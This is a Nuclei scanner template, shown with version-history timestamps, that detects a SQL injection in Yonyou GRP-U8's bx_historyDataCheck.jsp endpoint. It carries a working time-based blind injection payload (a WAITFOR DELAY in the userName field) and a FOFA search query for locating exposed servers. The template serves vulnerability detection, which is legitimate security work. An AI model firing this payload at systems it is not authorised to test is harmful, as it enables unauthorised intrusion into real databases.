nuclei-templates/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml

39 lines
1.1 KiB
YAML
Raw Normal View History

2023-09-27 11:22:56 +00:00
id: yonyou-u8-sqli
info:
2023-10-03 06:49:44 +00:00
name: Yonyou U8 bx_historyDataCheck - SQL Injection
2023-09-27 11:22:56 +00:00
author: xianke
severity: high
description: |
Yonyou U8 Grp contains a SQL injection vulnerability.
reference:
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-grp-u8-bx_historyDataChecks-sqli.yaml
- https://github.com/MD-SEC/MDPOCS/blob/main/Yongyou_Grp_U8_bx_historyDataCheck_Sql_Poc.py
metadata:
max-request: 1
fofa-query: icon_hash="-299520369"
verified: true
tags: yonyou,grp,sqli
http:
- raw:
2023-10-03 12:29:56 +00:00
- |
GET /login.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2023-09-27 11:22:56 +00:00
- |
POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
userName='%3bWAITFOR+DELAY+'0%3a0%3a5'--%26ysnd%3d%26historyFlag%3d
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
2023-10-03 12:29:56 +00:00
- 'contains(content_type_2, "text/html") && contains(body_1, "GRP-U8")'
2023-09-27 11:22:56 +00:00
condition: and